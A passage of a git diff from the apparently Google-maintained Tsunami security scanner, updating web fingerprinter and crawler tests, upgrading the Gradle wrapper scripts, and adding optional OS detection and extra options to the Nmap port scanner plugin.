com.google.inject.Guice; import com.google.inject.Provides; import com.google.inject.assistedinject.FactoryModuleBuilder; +import com.google.tsunami.common.data.NetworkEndpointUtils; import com.google.tsunami.common.net.http.HttpClientModule; import com.google.tsunami.plugins.fingerprinters.web.WebServiceFingerprinterConfigs.WebServiceFingerprinterCliOptions; import com.google.tsunami.plugins.fingerprinters.web.crawl.Crawler; @@ -52,6 +56,7 @@ import com.google.tsunami.proto.CrawlResult; import com.google.tsunami.proto.CrawlTarget; import com.google.tsunami.proto.FingerprintingReport; +import com.google.tsunami.proto.NetworkEndpoint; import com.google.tsunami.proto.NetworkService; import com.google.tsunami.proto.ServiceContext; import com.google.tsunami.proto.Software; @@ -60,9 +65,14 @@ import com.google.tsunami.proto.Version.VersionType; import com.google.tsunami.proto.VersionSet; import com.google.tsunami.proto.WebServiceContext; +import java.io.IOException; import java.util.Collection; import java.util.List; import javax.inject.Inject; +import okhttp3.mockwebserver.Dispatcher; +import okhttp3.mockwebserver.MockResponse; +import okhttp3.mockwebserver.MockWebServer; +import okhttp3.mockwebserver.RecordedRequest; import org.junit.Before; import org.junit.Test; import org.junit.runner.RunWith; @@ -74,12 +84,14 @@ public final class WebServiceFingerprinterTest { private final FakeCrawler fakeCrawler = new FakeCrawler(); private WebServiceFingerprinterCliOptions cliOptions; + private MockWebServer mockWebServer; @Inject WebServiceFingerprinter fingerprinter; @Before public void setUp() { cliOptions = new WebServiceFingerprinterCliOptions(); + mockWebServer = new MockWebServer(); Guice.createInjector( new AbstractModule() { @Override @@ -326,6 +338,62 @@ public void fingerprint_whenLimitContentSize_doNotRecordLargeCrawlResult() { .doesNotContain(SOFTWARE_3_CSS); } + @Test + public void fingerprint_mlflowServiceWithBasicAuth_fillsServiceContextWithApplication() + throws Exception { + fakeCrawler.setCrawlResults(ImmutableSet.of(SOFTWARE_4_MLFLOW)); + startMockMlflowWebServer(); + NetworkEndpoint endpoint = + forHostnameAndPort(mockWebServer.getHostName(), mockWebServer.getPort()); + NetworkService networkService = + NetworkService.newBuilder().setNetworkEndpoint(endpoint).setServiceName("http").build(); + + FingerprintingReport fingerprintingReport = + fingerprinter.fingerprint(TargetInfo.getDefaultInstance(), networkService); + + assertThat(fingerprintingReport) + .comparingExpectedFieldsOnly() + .isEqualTo( + FingerprintingReport.newBuilder() + .addNetworkServices( + networkService.toBuilder() + .setServiceName(SOFTWARE_IDENTITY_4.getSoftware()) + .setServiceContext( + ServiceContext.newBuilder() + .setWebServiceContext( + WebServiceContext.newBuilder() + .setApplicationRoot( + String.format( + "http://%s/", + NetworkEndpointUtils.toUriAuthority(endpoint))) + .setSoftware( + Software.newBuilder() + .setName(SOFTWARE_IDENTITY_4.getSoftware()))))) + .build()); + } + + private void startMockMlflowWebServer() throws IOException { + final Dispatcher dispatcher = + new Dispatcher() { + final MockResponse unauthorizedResponse = + new MockResponse() + .setResponseCode(401) + .setBody( + "You are not authenticated. " + + "Please see https://www.mlflow.org/docs/latest/auth/index.html" + + "#authenticating-to-mlflow " + + "on how to authenticate"); + + @Override + public MockResponse dispatch(RecordedRequest request) { + return unauthorizedResponse; + } + }; + mockWebServer.setDispatcher(dispatcher); + mockWebServer.start(); + mockWebServer.url("/"); + } + private static NetworkService addServiceContext( NetworkService networkService, String appRoot, diff --git a/google/fingerprinters/web/src/test/java/com/google/tsunami/plugins/fingerprinters/web/crawl/CrawlConfigUtilsTest.java b/google/fingerprinters/web/src/test/java/com/google/tsunami/plugins/fingerprinters/web/crawl/CrawlConfigUtilsTest.java index 32302db38..8028cde02 100644 --- a/google/fingerprinters/web/src/test/java/com/google/tsunami/plugins/fingerprinters/web/crawl/CrawlConfigUtilsTest.java +++ b/google/fingerprinters/web/src/test/java/com/google/tsunami/plugins/fingerprinters/web/crawl/CrawlConfigUtilsTest.java @@ -17,7 +17,10 @@ import static com.google.common.truth.Truth.assertThat; import static com.google.common.truth.extensions.proto.ProtoTruth.assertThat; +import static org.junit.Assert.assertFalse; +import static org.junit.Assert.assertTrue; +import com.google.common.collect.ImmutableList; import com.google.tsunami.proto.CrawlConfig; import com.google.tsunami.proto.CrawlConfig.Scope; import com.google.tsunami.proto.CrawlTarget; @@ -71,9 +74,11 @@ public void isCrawlTargetInScope_whenScopeEnforcementDisabled_alwaysReturnsTrue( CrawlTarget.newBuilder().setUrl("http://localhost:8080/in-scope/index.html").build())) .isTrue(); assertThat( - CrawlConfigUtils.isCrawlTargetInScope( - crawlConfig, - CrawlTarget.newBuilder().setUrl("http://localhost:8080/not-in-scope/index.html").build())) + CrawlConfigUtils.isCrawlTargetInScope( + crawlConfig, + CrawlTarget.newBuilder() + .setUrl("http://localhost:8080/not-in-scope/index.html") + .build())) .isTrue(); } @@ -124,4 +129,20 @@ public void isCrawlTargetInScope_whenEnforcingScopeCheckAndTargetNotInScope_retu .build())) .isFalse(); } + + @Test + public void isCrawlTargetInBlockList_inBlockList_returnsTrue() { + ImmutableList blockList = ImmutableList.of(".*/quit$", ".*/logout$"); + CrawlTarget target = CrawlTarget.newBuilder().setUrl("http://127.0.0.1/logout").build(); + + assertTrue(CrawlConfigUtils.isCrawlTargetInBlockList(target, blockList)); + } + + @Test + public void isCrawlTargetInBlockList_notInBlockList_returnsFalse() { + ImmutableList blockList = ImmutableList.of(".*/quit$", ".*/logout$"); + CrawlTarget target = CrawlTarget.newBuilder().setUrl("http://127.0.0.1/login").build(); + + assertFalse(CrawlConfigUtils.isCrawlTargetInBlockList(target, blockList)); + } } diff --git a/google/fingerprinters/web/src/test/java/com/google/tsunami/plugins/fingerprinters/web/crawl/SimpleCrawlActionTest.java b/google/fingerprinters/web/src/test/java/com/google/tsunami/plugins/fingerprinters/web/crawl/SimpleCrawlActionTest.java index d4870faea..37c443985 100644 --- a/google/fingerprinters/web/src/test/java/com/google/tsunami/plugins/fingerprinters/web/crawl/SimpleCrawlActionTest.java +++ b/google/fingerprinters/web/src/test/java/com/google/tsunami/plugins/fingerprinters/web/crawl/SimpleCrawlActionTest.java @@ -20,12 +20,17 @@ import static java.nio.charset.StandardCharsets.UTF_8; import com.google.common.io.Resources; +import com.google.inject.AbstractModule; import com.google.inject.Guice; import com.google.tsunami.common.net.http.HttpClient; import com.google.tsunami.common.net.http.HttpClientModule; +import com.google.tsunami.plugins.fingerprinters.web.WebServiceFingerprinterConfigs; +import com.google.tsunami.plugins.fingerprinters.web.WebServiceFingerprinterConfigs.WebServiceFingerprinterCliOptions; +import com.google.tsunami.plugins.fingerprinters.web.WebServiceFingerprinterConfigs.WebServiceFingerprinterConfigProperties; import com.google.tsunami.proto.CrawlTarget; import java.io.IOException; import java.util.concurrent.ForkJoinPool; +import javax.inject.Inject; import okhttp3.mockwebserver.MockWebServer; import org.junit.After; import org.junit.Before; @@ -41,11 +46,28 @@ public final class SimpleCrawlActionTest { private SimpleCrawlerResults crawlerResults; private MockWebServer mockWebServer; private TestDataBuilder dataBuilder; + private WebServiceFingerprinterCliOptions cliOptions; + private WebServiceFingerprinterConfigProperties configProperties; + + @Inject WebServiceFingerprinterConfigs configs; @Before public void setUp() { + cliOptions = new WebServiceFingerprinterCliOptions(); + configProperties = new WebServiceFingerprinterConfigProperties(); + Guice.createInjector( + new AbstractModule() { + @Override + protected void configure() { + bind(WebServiceFingerprinterCliOptions.class).toInstance(cliOptions); + bind(WebServiceFingerprinterConfigProperties.class) + .toInstance(configProperties); + } + } + ).injectMembers(this); httpClient = - Guice.createInjector(new HttpClientModule.Builder().build()) + Guice.createInjector( + new HttpClientModule.Builder().build()) .getInstance(HttpClient.class) .modify() .setFollowRedirects(false) @@ -64,11 +86,13 @@ public void tearDown() throws IOException { public void getTargetUrl_always_returnsUrlFromCrawlTarget() { assertThat( new SimpleCrawlAction( - 0, - httpClient, - dataBuilder.buildCrawlConfig(), - dataBuilder.buildCrawlTargetForSeedPath("/path"), - crawlerResults).getTargetUrl()) + 0, + httpClient, + dataBuilder.buildCrawlConfig(), + dataBuilder.buildCrawlTargetForSeedPath("/path"), + crawlerResults, + configs) + .getTargetUrl()) .isEqualTo(mockWebServer.url("/path").toString()); } @@ -83,7 +107,8 @@ public void compute_whenUrlAlreadyVisited_doesNotCrawlSameTarget() { httpClient, dataBuilder.buildCrawlConfig(), CrawlTarget.getDefaultInstance(), - crawlerResults)); + crawlerResults, + configs)); assertThat(mockWebServer.getRequestCount()).isEqualTo(0); } @@ -99,7 +124,8 @@ public void compute_whenTargetUrlIsInvalid_ignoresCrawlTarget() { dataBuilder.buildCrawlTargetForSeedPath("").toBuilder() .setUrl("invalid-url") .build(), - crawlerResults)); + crawlerResults, + configs)); assertThat(mockWebServer.getRequestCount()).isEqualTo(0); assertThat(crawlerResults.getFinalResults()).isEmpty(); @@ -114,7 +140,8 @@ public void compute_whenHttpRequestError_ignoresCrawlTarget() { httpClient, dataBuilder.buildCrawlConfig(), dataBuilder.buildCrawlTargetForSeedPath("/timeout").toBuilder().build(), - crawlerResults)); + crawlerResults, + configs)); assertThat(mockWebServer.getRequestCount()).isEqualTo(1); assertThat(crawlerResults.getFinalResults()).isEmpty(); @@ -134,7 +161,8 @@ public void compute_whenSeedingUrlRedirects_followsRedirect() throws IOException httpClient, dataBuilder.buildCrawlConfig(), dataBuilder.buildCrawlTargetForSeedPath("/redirect"), - crawlerResults)); + crawlerResults, + configs)); assertThat(crawlerResults.getFinalResults()) .containsExactly( @@ -163,7 +191,8 @@ public void compute_whenExceedsMaxDepth_stopsCrawlingAtMaxDepth() throws IOExcep httpClient, dataBuilder.buildCrawlConfig().toBuilder().setMaxDepth(1).build(), dataBuilder.buildCrawlTargetForSeedPath("/redirect"), - crawlerResults)); + crawlerResults, + configs)); assertThat(crawlerResults.getFinalResults()) .containsExactly( @@ -186,7 +215,8 @@ public void compute_whenHtmlPageContainsOutOfScopeLink_ignoresOutOfScopeLink() httpClient, dataBuilder.buildCrawlConfig(), dataBuilder.buildCrawlTargetForSeedPath("/"), - crawlerResults)); + crawlerResults, + configs)); assertThat(crawlerResults.getFinalResults()) .containsExactly(dataBuilder.buildCrawlResult(0, "/", body)); @@ -209,7 +239,8 @@ private void assetCrawlResults(String testdataResourceName) throws Exception { httpClient, dataBuilder.buildCrawlConfig(), dataBuilder.buildCrawlTargetForSeedPath("/"), - crawlerResults)); + crawlerResults, + configs)); assertThat(crawlerResults.getFinalResults()) .containsExactly( diff --git a/google/portscan/nmap/gradle/wrapper/gradle-wrapper.jar b/google/portscan/nmap/gradle/wrapper/gradle-wrapper.jar index 62d4c0535..d64cd4917 100644 Binary files a/google/portscan/nmap/gradle/wrapper/gradle-wrapper.jar and b/google/portscan/nmap/gradle/wrapper/gradle-wrapper.jar differ diff --git a/google/portscan/nmap/gradle/wrapper/gradle-wrapper.properties b/google/portscan/nmap/gradle/wrapper/gradle-wrapper.properties index 622ab64a3..d04736436 100644 --- a/google/portscan/nmap/gradle/wrapper/gradle-wrapper.properties +++ b/google/portscan/nmap/gradle/wrapper/gradle-wrapper.properties @@ -1,5 +1,7 @@ distributionBase=GRADLE_USER_HOME distributionPath=wrapper/dists -distributionUrl=https\://services.gradle.org/distributions/gradle-6.5-bin.zip +distributionUrl=https\://services.gradle.org/distributions/gradle-7.0-bin.zip +networkTimeout=10000 +validateDistributionUrl=true zipStoreBase=GRADLE_USER_HOME zipStorePath=wrapper/dists diff --git a/google/portscan/nmap/gradlew b/google/portscan/nmap/gradlew index fbd7c5158..1aa94a426 100755 --- a/google/portscan/nmap/gradlew +++ b/google/portscan/nmap/gradlew @@ -1,7 +1,7 @@ -#!/usr/bin/env sh +#!/bin/sh # -# Copyright 2015 the original author or authors. +# Copyright © 2015-2021 the original authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. @@ -17,67 +17,99 @@ # ############################################################################## -## -## Gradle start up script for UN*X -## +# +# Gradle start up script for POSIX generated by Gradle. +# +# Important for running: +# +# (1) You need a POSIX-compliant shell to run this script. If your /bin/sh is +# noncompliant, but you have some other compliant shell such as ksh or +# bash, then to run this script, type that shell name before the whole +# command line, like: +# +# ksh Gradle +# +# Busybox and similar reduced shells will NOT work, because this script +# requires all of these POSIX shell features: +# * functions; +# * expansions «$var», «${var}», «${var:-default}», «${var+SET}», +# «${var#prefix}», «${var%suffix}», and «$( cmd )»; +# * compound commands having a testable exit status, especially «case»; +# * various built-in commands including «command», «set», and «ulimit». +# +# Important for patching: +# +# (2) This script targets any POSIX shell, so it avoids extensions provided +# by Bash, Ksh, etc; in particular arrays are avoided. +# +# The "traditional" practice of packing multiple parameters into a +# space-separated string is a well documented source of bugs and security +# problems, so this is (mostly) avoided, by progressively accumulating +# options in "$@", and eventually passing that to Java. +# +# Where the inherited environment variables (DEFAULT_JVM_OPTS, JAVA_OPTS, +# and GRADLE_OPTS) rely on word-splitting, this is performed explicitly; +# see the in-line comments for details. +# +# There are tweaks for specific operating systems such as AIX, CygWin, +# Darwin, MinGW, and NonStop. +# +# (3) This script is generated from the Groovy template +# https://github.com/gradle/gradle/blob/HEAD/subprojects/plugins/src/main/resources/org/gradle/api/internal/plugins/unixStartScript.txt +# within the Gradle project. +# +# You can find Gradle at https://github.com/gradle/gradle/. +# ############################################################################## # Attempt to set APP_HOME + # Resolve links: $0 may be a link -PRG="$0" -# Need this for relative symlinks. -while [ -h "$PRG" ] ; do - ls=`ls -ld "$PRG"` - link=`expr "$ls" : '.*-> \(.*\)$'` - if expr "$link" : '/.*' > /dev/null; then - PRG="$link" - else - PRG=`dirname "$PRG"`"/$link" - fi +app_path=$0 + +# Need this for daisy-chained symlinks. +while + APP_HOME=${app_path%"${app_path##*/}"} # leaves a trailing /; empty if no leading path + [ -h "$app_path" ] +do + ls=$( ls -ld "$app_path" ) + link=${ls#*' -> '} + case $link in #( + /*) app_path=$link ;; #( + *) app_path=$APP_HOME$link ;; + esac done -SAVED="`pwd`" -cd "`dirname \"$PRG\"`/" >/dev/null -APP_HOME="`pwd -P`" -cd "$SAVED" >/dev/null -APP_NAME="Gradle" -APP_BASE_NAME=`basename "$0"` - -# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. -DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' +# This is normally unused +# shellcheck disable=SC2034 +APP_BASE_NAME=${0##*/} +# Discard cd standard output in case $CDPATH is set (https://github.com/gradle/gradle/issues/25036) +APP_HOME=$( cd "${APP_HOME:-./}" > /dev/null && pwd -P ) || exit # Use the maximum available, or set MAX_FD != -1 to use that value. -MAX_FD="maximum" +MAX_FD=maximum warn () { echo "$*" -} +} >&2 die () { echo echo "$*" echo exit 1 -} +} >&2 # OS specific support (must be 'true' or 'false'). cygwin=false msys=false darwin=false nonstop=false -case "`uname`" in - CYGWIN* ) - cygwin=true - ;; - Darwin* ) - darwin=true - ;; - MINGW* ) - msys=true - ;; - NONSTOP* ) - nonstop=true - ;; +case "$( uname )" in #( + CYGWIN* ) cygwin=true ;; #( + Darwin* ) darwin=true ;; #( + MSYS* | MINGW* ) msys=true ;; #( + NONSTOP* ) nonstop=true ;; esac CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar @@ -87,9 +119,9 @@ CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar if [ -n "$JAVA_HOME" ] ; then if [ -x "$JAVA_HOME/jre/sh/java" ] ; then # IBM's JDK on AIX uses strange locations for the executables - JAVACMD="$JAVA_HOME/jre/sh/java" + JAVACMD=$JAVA_HOME/jre/sh/java else - JAVACMD="$JAVA_HOME/bin/java" + JAVACMD=$JAVA_HOME/bin/java fi if [ ! -x "$JAVACMD" ] ; then die "ERROR: JAVA_HOME is set to an invalid directory: $JAVA_HOME @@ -98,88 +130,120 @@ Please set the JAVA_HOME variable in your environment to match the location of your Java installation." fi else - JAVACMD="java" - which java >/dev/null 2>&1 || die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. + JAVACMD=java + if ! command -v java >/dev/null 2>&1 + then + die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. Please set the JAVA_HOME variable in your environment to match the location of your Java installation." + fi fi # Increase the maximum file descriptors if we can. -if [ "$cygwin" = "false" -a "$darwin" = "false" -a "$nonstop" = "false" ] ; then - MAX_FD_LIMIT=`ulimit -H -n` - if [ $? -eq 0 ] ; then - if [ "$MAX_FD" = "maximum" -o "$MAX_FD" = "max" ] ; then - MAX_FD="$MAX_FD_LIMIT" - fi - ulimit -n $MAX_FD - if [ $? -ne 0 ] ; then - warn "Could not set maximum file descriptor limit: $MAX_FD" - fi - else - warn "Could not query maximum file descriptor limit: $MAX_FD_LIMIT" - fi +if ! "$cygwin" && ! "$darwin" && ! "$nonstop" ; then + case $MAX_FD in #( + max*) + # In POSIX sh, ulimit -H is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + MAX_FD=$( ulimit -H -n ) || + warn "Could not query maximum file descriptor limit" + esac + case $MAX_FD in #( + '' | soft) :;; #( + *) + # In POSIX sh, ulimit -n is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + ulimit -n "$MAX_FD" || + warn "Could not set maximum file descriptor limit to $MAX_FD" + esac fi -# For Darwin, add options to specify how the application appears in the dock -if $darwin; then - GRADLE_OPTS="$GRADLE_OPTS \"-Xdock:name=$APP_NAME\" \"-Xdock:icon=$APP_HOME/media/gradle.icns\"" -fi +# Collect all arguments for the java command, stacking in reverse order: +# * args from the command line +# * the main class name +# * -classpath +# * -D...appname settings +# * --module-path (only if needed) +# * DEFAULT_JVM_OPTS, JAVA_OPTS, and GRADLE_OPTS environment variables. # For Cygwin or MSYS, switch paths to Windows format before running java -if [ "$cygwin" = "true" -o "$msys" = "true" ] ; then - APP_HOME=`cygpath --path --mixed "$APP_HOME"` - CLASSPATH=`cygpath --path --mixed "$CLASSPATH"` - - JAVACMD=`cygpath --unix "$JAVACMD"` - - # We build the pattern for arguments to be converted via cygpath - ROOTDIRSRAW=`find -L / -maxdepth 1 -mindepth 1 -type d 2>/dev/null` - SEP="" - for dir in $ROOTDIRSRAW ; do - ROOTDIRS="$ROOTDIRS$SEP$dir" - SEP="|" - done - OURCYGPATTERN="(^($ROOTDIRS))" - # Add a user-defined pattern to the cygpath arguments - if [ "$GRADLE_CYGPATTERN" != "" ] ; then - OURCYGPATTERN="$OURCYGPATTERN|($GRADLE_CYGPATTERN)" - fi +if "$cygwin" || "$msys" ; then + APP_HOME=$( cygpath --path --mixed "$APP_HOME" ) + CLASSPATH=$( cygpath --path --mixed "$CLASSPATH" ) + + JAVACMD=$( cygpath --unix "$JAVACMD" ) + # Now convert the arguments - kludge to limit ourselves to /bin/sh - i=0 - for arg in "$@" ; do - CHECK=`echo "$arg"|egrep -c "$OURCYGPATTERN" -` - CHECK2=`echo "$arg"|egrep -c "^-"` ### Determine if an option - - if [ $CHECK -ne 0 ] && [ $CHECK2 -eq 0 ] ; then ### Added a condition - eval `echo args$i`=`cygpath --path --ignore --mixed "$arg"` - else - eval `echo args$i`="\"$arg\"" + for arg do + if + case $arg in #( + -*) false ;; # don't mess with options #( + /?*) t=${arg#/} t=/${t%%/*} # looks like a POSIX filepath + [ -e "$t" ] ;; #( + *) false ;; + esac + then + arg=$( cygpath --path --ignore --mixed "$arg" ) fi - i=`expr $i + 1` + # Roll the args list around exactly as many times as the number of + # args, so each arg winds up back in the position where it started, but + # possibly modified. + # + # NB: a `for` loop captures its iteration list before it begins, so + # changing the positional parameters here affects neither the number of + # iterations, nor the values presented in `arg`. + shift # remove old arg + set -- "$@" "$arg" # push replacement arg done - case $i in - 0) set -- ;; - 1) set -- "$args0" ;; - 2) set -- "$args0" "$args1" ;; - 3) set -- "$args0" "$args1" "$args2" ;; - 4) set -- "$args0" "$args1" "$args2" "$args3" ;; - 5) set -- "$args0" "$args1" "$args2" "$args3" "$args4" ;; - 6) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" ;; - 7) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" ;; - 8) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" ;; - 9) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" "$args8" ;; - esac fi -# Escape application args -save () { - for i do printf %s\\n "$i" | sed "s/'/'\\\\''/g;1s/^/'/;\$s/\$/' \\\\/" ; done - echo " " -} -APP_ARGS=`save "$@"` -# Collect all arguments for the java command, following the shell quoting and substitution rules -eval set -- $DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS "\"-Dorg.gradle.appname=$APP_BASE_NAME\"" -classpath "\"$CLASSPATH\"" org.gradle.wrapper.GradleWrapperMain "$APP_ARGS" +# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' + +# Collect all arguments for the java command: +# * DEFAULT_JVM_OPTS, JAVA_OPTS, JAVA_OPTS, and optsEnvironmentVar are not allowed to contain shell fragments, +# and any embedded shellness will be escaped. +# * For example: A user cannot expect ${Hostname} to be expanded, as it is an environment variable and will be +# treated as '${Hostname}' itself on the command line. + +set -- \ + "-Dorg.gradle.appname=$APP_BASE_NAME" \ + -classpath "$CLASSPATH" \ + org.gradle.wrapper.GradleWrapperMain \ + "$@" + +# Stop when "xargs" is not available. +if ! command -v xargs >/dev/null 2>&1 +then + die "xargs is not available" +fi + +# Use "xargs" to parse quoted args. +# +# With -n1 it outputs one arg per line, with the quotes and backslashes removed. +# +# In Bash we could simply go: +# +# readarray ARGS < <( xargs -n1 <<<"$var" ) && +# set -- "${ARGS[@]}" "$@" +# +# but POSIX shell has neither arrays nor command substitution, so instead we +# post-process each arg (as a line of input to sed) to backslash-escape any +# character that might be a shell metacharacter, then use eval to reverse +# that process (while maintaining the separation between arguments), and wrap +# the whole thing up as a single "set" statement. +# +# This will of course break if any of these variables contains a newline or +# an unmatched quote. +# + +eval "set -- $( + printf '%s\n' "$DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS" | + xargs -n1 | + sed ' s~[^-[:alnum:]+,./:=@_]~\\&~g; ' | + tr '\n' ' ' + )" '"$@"' exec "$JAVACMD" "$@" diff --git a/google/portscan/nmap/gradlew.bat b/google/portscan/nmap/gradlew.bat old mode 100755 new mode 100644 index 5093609d5..93e3f59f1 --- a/google/portscan/nmap/gradlew.bat +++ b/google/portscan/nmap/gradlew.bat @@ -14,7 +14,7 @@ @rem limitations under the License. @rem -@if "%DEBUG%" == "" @echo off +@if "%DEBUG%"=="" @echo off @rem ########################################################################## @rem @rem Gradle startup script for Windows @@ -25,7 +25,8 @@ if "%OS%"=="Windows_NT" setlocal set DIRNAME=%~dp0 -if "%DIRNAME%" == "" set DIRNAME=. +if "%DIRNAME%"=="" set DIRNAME=. +@rem This is normally unused set APP_BASE_NAME=%~n0 set APP_HOME=%DIRNAME% @@ -40,7 +41,7 @@ if defined JAVA_HOME goto findJavaFromJavaHome set JAVA_EXE=java.exe %JAVA_EXE% -version >NUL 2>&1 -if "%ERRORLEVEL%" == "0" goto init +if %ERRORLEVEL% equ 0 goto execute echo. echo ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. @@ -54,7 +55,7 @@ goto fail set JAVA_HOME=%JAVA_HOME:"=% set JAVA_EXE=%JAVA_HOME%/bin/java.exe -if exist "%JAVA_EXE%" goto init +if exist "%JAVA_EXE%" goto execute echo. echo ERROR: JAVA_HOME is set to an invalid directory: %JAVA_HOME% @@ -64,21 +65,6 @@ echo location of your Java installation. goto fail -:init -@rem Get command-line arguments, handling Windows variants - -if not "%OS%" == "Windows_NT" goto win9xME_args - -:win9xME_args -@rem Slurp the command line arguments. -set CMD_LINE_ARGS= -set _SKIP=2 - -:win9xME_args_slurp -if "x%~1" == "x" goto execute - -set CMD_LINE_ARGS=%* - :execute @rem Setup the command line @@ -86,17 +72,19 @@ set CLASSPATH=%APP_HOME%\gradle\wrapper\gradle-wrapper.jar @rem Execute Gradle -"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %CMD_LINE_ARGS% +"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %* :end @rem End local scope for the variables with windows NT shell -if "%ERRORLEVEL%"=="0" goto mainEnd +if %ERRORLEVEL% equ 0 goto mainEnd :fail rem Set variable GRADLE_EXIT_CONSOLE if you need the _script_ return code instead of rem the _cmd.exe /c_ return code! -if not "" == "%GRADLE_EXIT_CONSOLE%" exit 1 -exit /b 1 +set EXIT_CODE=%ERRORLEVEL% +if %EXIT_CODE% equ 0 set EXIT_CODE=1 +if not ""=="%GRADLE_EXIT_CONSOLE%" exit %EXIT_CODE% +exit /b %EXIT_CODE% :mainEnd if "%OS%"=="Windows_NT" endlocal diff --git a/google/portscan/nmap/src/main/java/com/google/tsunami/plugins/portscan/nmap/NmapPortScanner.java b/google/portscan/nmap/src/main/java/com/google/tsunami/plugins/portscan/nmap/NmapPortScanner.java index 32a6c29c8..f6ee5c55b 100644 --- a/google/portscan/nmap/src/main/java/com/google/tsunami/plugins/portscan/nmap/NmapPortScanner.java +++ b/google/portscan/nmap/src/main/java/com/google/tsunami/plugins/portscan/nmap/NmapPortScanner.java @@ -27,6 +27,7 @@ import com.google.tsunami.common.command.CommandExecutionThreadPool; import com.google.tsunami.common.data.NetworkEndpointUtils; import com.google.tsunami.common.data.NetworkServiceUtils; +import com.google.tsunami.common.net.http.HttpClientCliOptions; import com.google.tsunami.plugin.PluginType; import com.google.tsunami.plugin.PortScanner; import com.google.tsunami.plugin.annotations.PluginInfo; @@ -39,12 +40,14 @@ import com.google.tsunami.plugins.portscan.nmap.client.result.Host; import com.google.tsunami.plugins.portscan.nmap.client.result.Hostname; import com.google.tsunami.plugins.portscan.nmap.client.result.NmapRun; +import com.google.tsunami.plugins.portscan.nmap.client.result.OsClass; import com.google.tsunami.plugins.portscan.nmap.client.result.Port; import com.google.tsunami.plugins.portscan.nmap.client.result.Ports; import com.google.tsunami.plugins.portscan.nmap.client.result.Script; import com.google.tsunami.plugins.portscan.nmap.option.NmapPortScannerCliOptions; import com.google.tsunami.proto.NetworkEndpoint; import com.google.tsunami.proto.NetworkService; +import com.google.tsunami.proto.OperatingSystemClass; import com.google.tsunami.proto.PortScanningReport; import com.google.tsunami.proto.ScanTarget; import com.google.tsunami.proto.ServiceContext; @@ -74,11 +77,13 @@ bootstrapModule = NmapPortScannerBootstrapModule.class) public final class NmapPortScanner implements PortScanner { private static final GoogleLogger logger = GoogleLogger.forEnclosingClass(); + private static final int MAX_NUMBER_OF_OS_GUESSES = 1; private final NmapClient nmapClient; private final Executor commandExecutor; private final NmapPortScannerConfigs configs; private final NmapPortScannerCliOptions cliOptions; + private final HttpClientCliOptions httpClientCliOptions; private ScanTarget scanTarget; @@ -87,11 +92,19 @@ public final class NmapPortScanner implements PortScanner { NmapClient nmapClient, @CommandExecutionThreadPool Executor commandExecutor, NmapPortScannerConfigs configs, - NmapPortScannerCliOptions cliOptions) { + NmapPortScannerCliOptions cliOptions, + HttpClientCliOptions httpClientCliOptions) { this.nmapClient = checkNotNull(nmapClient); this.commandExecutor = checkNotNull(commandExecutor); this.configs = checkNotNull(configs); this.cliOptions = checkNotNull(cliOptions); + this.httpClientCliOptions = checkNotNull(httpClientCliOptions); + } + + private static boolean isRunningInPrivilegedMode() { + // TODO(b/353644363): implement proper heuristics for this. For now, autodetection is just + // turned off. + return false; } @Override @@ -100,20 +113,29 @@ public PortScanningReport scan(ScanTarget scanTarget) { try { logger.atInfo().log("Starting nmap scan."); Stopwatch stopwatch = Stopwatch.createStarted(); - NmapRun result = - setPortTargets(nmapClient) - .withDnsResolution(DnsResolution.NEVER) - .treatAllHostsAsOnline() - .withScanTechnique(ScanTechnique.CONNECT) - .asUnprivileged() - .withServiceAndVersionDetection() - .withVersionDetectionIntensity(5) - .withScript("banner") - .withScript("ssl-enum-ciphers") - .withScript("http-methods", "http.useragent=TsunamiSecurityScanner") - .withTimingTemplate(TimingTemplate.AGGRESSIVE) - .withTargetNetworkEndpoint(scanTarget.getNetworkEndpoint()) - .run(commandExecutor); + setPortTargets(nmapClient) + .withDnsResolution(DnsResolution.NEVER) + .treatAllHostsAsOnline() + .withScanTechnique(ScanTechnique.CONNECT) + .withServiceAndVersionDetection() + .withVersionDetectionIntensity(5) + .withScript("banner") + .withScript("ssl-enum-ciphers") + .withScript("http-methods", "http.useragent=" + httpClientCliOptions.userAgent) + .withTimingTemplate(TimingTemplate.AGGRESSIVE) + .withTargetNetworkEndpoint(scanTarget.getNetworkEndpoint()) + .withExtraCommandLineOptions(cliOptions.nmapCmdOpts); + + if (isRunningInPrivilegedMode() || cliOptions.nmapOsDetection) { + // According to https://nmap.org/book/osdetect-methods.html, OS fingerprinting sends + // up to 16 packets altogether, so it should not increase the scan time. + // Also, OS detection requires privileged mode, so we don't set the unprivileged flag. + nmapClient.withOsDetection().asPrivileged(); + } else { + nmapClient.asUnprivileged(); + } + + NmapRun result = nmapClient.run(commandExecutor); logger.atInfo().log( "Finished nmap scan on target '%s' in %s.", loggableScanTarget(scanTarget), stopwatch.stop()); @@ -210,14 +232,51 @@ private PortScanningReport extractServicesFromNmapRun(NmapRun nmapRun) { } private TargetInfo buildTargetInfoFromNmaprun(NmapRun nmapRun) { - return TargetInfo.newBuilder() - .addNetworkEndpoints( - 